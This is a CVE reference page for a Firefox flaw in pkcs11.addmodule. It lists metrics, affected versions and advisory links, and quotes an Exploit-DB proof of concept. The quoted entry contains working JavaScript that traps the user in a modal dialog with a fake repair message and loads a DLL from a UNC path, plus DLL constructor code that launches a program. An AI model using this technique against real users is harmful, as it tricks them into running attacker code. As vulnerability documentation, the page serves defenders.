CVE-2009-3076: Details

CVE-2009-3076

88.69%V3
Network
2009-09-10 19h00 +00:00
2017-09-18 10h57 +00:00

CVE Descriptions

Mozilla Firefox before 3.0.14 does not properly implement certain dialogs associated with the (1) pkcs11.addmodule and (2) pkcs11.deletemodule operations, which makes it easier for remote attackers to trick a user into installing or removing an arbitrary PKCS11 module.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare a CVE's EPSS score against that of other CVEs.

Exploit Information

Exploit Database EDB-ID: 9651

Publication date: 2009-09-10 22h00 +00:00
Author: Dan Kaminsky
EDB Verified: Yes

Fix announce: http://www.mozilla.org/security/announce/2009/mfsa2009-48.html
Bug history: https://bugzilla.mozilla.org/show_bug.cgi?id=326628

So, Firefox up through 3.0.13 had an obscure little function under window.pkcs11:

long addmodule(in DOMString moduleName, in DOMString libraryFullPath, in long cryptoMechanismFlags, in long cipherFlags);

Yes, that's actually the full path to a DLL -- or an .so on Linux/OSX -- from a JS function that's exposed to the web. Attacker doesn't get zero click install -- there's a dialog -- but:

1) Attacker does get to customize the dialog via moduleName
2) The dialog is modal, so the user doesn't get access to Firefox again until they hit OK (can't even close Firefox)
3) On Windows, he can put a UNC path in for the Library path. There's probably similar on OSX and some Linux distros. Even without, there's usually a way to get a file in a known location -- see John Heasman's Java work.

LoadLibrary of Attacker library on OK.

Repro:

<body>
<script>
var str = "Error detected in Firefox Module NSP31337.bin.\n" +
          "Please click 'OK' to repair."
ret=-2;
while(ret!=-5){
    ret=window.pkcs11.addmodule("\n\n\n" + str + "\n\n\n", "\\\\127.0.0.1\\c$\\ pkunkcs", 0, 0);
}
</script>

"Shellcode" is just a DLL with ShellExecute in the constructor:

CpkunkcsApp::CpkunkcsApp()
{
    char *str = "c:\\windows\\system32\\calc.exe";
    wchar_t *wText;
    size_t len;
    len = strlen(str)+1;
    wText = new wchar_t[strlen(str)];
    memset(wText, 0, len * sizeof(wchar_t));
    ::MultiByteToWideChar(CP_ACP, NULL, str, -1, wText, len);
    ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW);
}

Cheers to Jesse Ruderman, who recognized this was probably not the greatest of API's some time ago. The bug history is worth taking a look at...goes back a while. They missed the UNC path vector, and appear to have underestimated the modal dialog.

# milw0rm.com [2009-09-11]

Products Mentioned

Configuration 0

Mozilla>>Firefox >> Version To (including) 3.0.13

Mozilla>>Firefox >> Version 0.1

Mozilla>>Firefox >> Version 0.2

Mozilla>>Firefox >> Version 0.3

Mozilla>>Firefox >> Version 0.4

Mozilla>>Firefox >> Version 0.5

Mozilla>>Firefox >> Version 0.6

Mozilla>>Firefox >> Version 0.6.1

Mozilla>>Firefox >> Version 0.7

Mozilla>>Firefox >> Version 0.7.1

Mozilla>>Firefox >> Version 0.8

Mozilla>>Firefox >> Version 0.9

Mozilla>>Firefox >> Version 0.9

Mozilla>>Firefox >> Version 0.9.1

Mozilla>>Firefox >> Version 0.9.2

Mozilla>>Firefox >> Version 0.9.3

Mozilla>>Firefox >> Version 0.9_rc

Mozilla>>Firefox >> Version 0.10

Mozilla>>Firefox >> Version 0.10.1

Mozilla>>Firefox >> Version 1.0

Mozilla>>Firefox >> Version 1.0

Mozilla>>Firefox >> Version 1.0.1

Mozilla>>Firefox >> Version 1.0.2

Mozilla>>Firefox >> Version 1.0.3

Mozilla>>Firefox >> Version 1.0.4

Mozilla>>Firefox >> Version 1.0.5

Mozilla>>Firefox >> Version 1.0.6

Mozilla>>Firefox >> Version 1.0.7

Mozilla>>Firefox >> Version 1.0.8

Mozilla>>Firefox >> Version 1.4.1

Mozilla>>Firefox >> Version 1.5

Mozilla>>Firefox >> Version 1.5

Mozilla>>Firefox >> Version 1.5

Mozilla>>Firefox >> Version 1.5.0.1

Mozilla>>Firefox >> Version 1.5.0.2

Mozilla>>Firefox >> Version 1.5.0.3

Mozilla>>Firefox >> Version 1.5.0.4

Mozilla>>Firefox >> Version 1.5.0.5

Mozilla>>Firefox >> Version 1.5.0.6

Mozilla>>Firefox >> Version 1.5.0.7

Mozilla>>Firefox >> Version 1.5.0.8

Mozilla>>Firefox >> Version 1.5.0.9

Mozilla>>Firefox >> Version 1.5.0.10

Mozilla>>Firefox >> Version 1.5.0.11

Mozilla>>Firefox >> Version 1.5.0.12

Mozilla>>Firefox >> Version 1.5.1

Mozilla>>Firefox >> Version 1.5.2

Mozilla>>Firefox >> Version 1.5.3

Mozilla>>Firefox >> Version 1.5.4

Mozilla>>Firefox >> Version 1.5.5

Mozilla>>Firefox >> Version 1.5.6

Mozilla>>Firefox >> Version 1.5.7

Mozilla>>Firefox >> Version 1.5.8

Mozilla>>Firefox >> Version 1.8

Mozilla>>Firefox >> Version 2.0

Mozilla>>Firefox >> Version 2.0

Mozilla>>Firefox >> Version 2.0

Mozilla>>Firefox >> Version 2.0

Mozilla>>Firefox >> Version 2.0

Mozilla>>Firefox >> Version 2.0.0.1

Mozilla>>Firefox >> Version 2.0.0.2

Mozilla>>Firefox >> Version 2.0.0.3

Mozilla>>Firefox >> Version 2.0.0.4

Mozilla>>Firefox >> Version 2.0.0.5

Mozilla>>Firefox >> Version 2.0.0.6

Mozilla>>Firefox >> Version 2.0.0.7

Mozilla>>Firefox >> Version 2.0.0.8

Mozilla>>Firefox >> Version 2.0.0.9

Mozilla>>Firefox >> Version 2.0.0.10

Mozilla>>Firefox >> Version 2.0.0.11

Mozilla>>Firefox >> Version 2.0.0.12

Mozilla>>Firefox >> Version 2.0.0.13

Mozilla>>Firefox >> Version 2.0.0.14

Mozilla>>Firefox >> Version 2.0.0.15

Mozilla>>Firefox >> Version 2.0.0.16

Mozilla>>Firefox >> Version 2.0.0.17

Mozilla>>Firefox >> Version 2.0.0.18

Mozilla>>Firefox >> Version 2.0.0.19

Mozilla>>Firefox >> Version 2.0.0.20

Mozilla>>Firefox >> Version 2.0.0.21

Mozilla>>Firefox >> Version 2.0_.1

Mozilla>>Firefox >> Version 2.0_.4

Mozilla>>Firefox >> Version 2.0_.5

Mozilla>>Firefox >> Version 2.0_.6

Mozilla>>Firefox >> Version 2.0_.7

Mozilla>>Firefox >> Version 2.0_.9

Mozilla>>Firefox >> Version 2.0_.10

Mozilla>>Firefox >> Version 2.0_8

Mozilla>>Firefox >> Version 3.0

Mozilla>>Firefox >> Version 3.0

Mozilla>>Firefox >> Version 3.0

Mozilla>>Firefox >> Version 3.0

Mozilla>>Firefox >> Version 3.0.1

Mozilla>>Firefox >> Version 3.0.2

Mozilla>>Firefox >> Version 3.0.3

Mozilla>>Firefox >> Version 3.0.4

Mozilla>>Firefox >> Version 3.0.5

Mozilla>>Firefox >> Version 3.0.6

Mozilla>>Firefox >> Version 3.0.7

Mozilla>>Firefox >> Version 3.0.8

Mozilla>>Firefox >> Version 3.0.9

Mozilla>>Firefox >> Version 3.0.10

Mozilla>>Firefox >> Version 3.0.11

Mozilla>>Firefox >> Version 3.0.12

References

http://www.securitytracker.com/id?1022877
Tags: vdb-entry, x_refsource_SECTRACK
http://www.debian.org/security/2009/dsa-1885
Tags: vendor-advisory, x_refsource_DEBIAN
http://www.redhat.com/support/errata/RHSA-2010-0153.html
Tags: vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/36343
Tags: vdb-entry, x_refsource_BID
http://www.redhat.com/support/errata/RHSA-2009-1430.html
Tags: vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2010/0650
Tags: vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/36692
Tags: third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36670
Tags: third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36671
Tags: third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36669
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0154.html
Tags: vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2009-1432.html
Tags: vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/37098
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2009-1431.html
Tags: vendor-advisory, x_refsource_REDHAT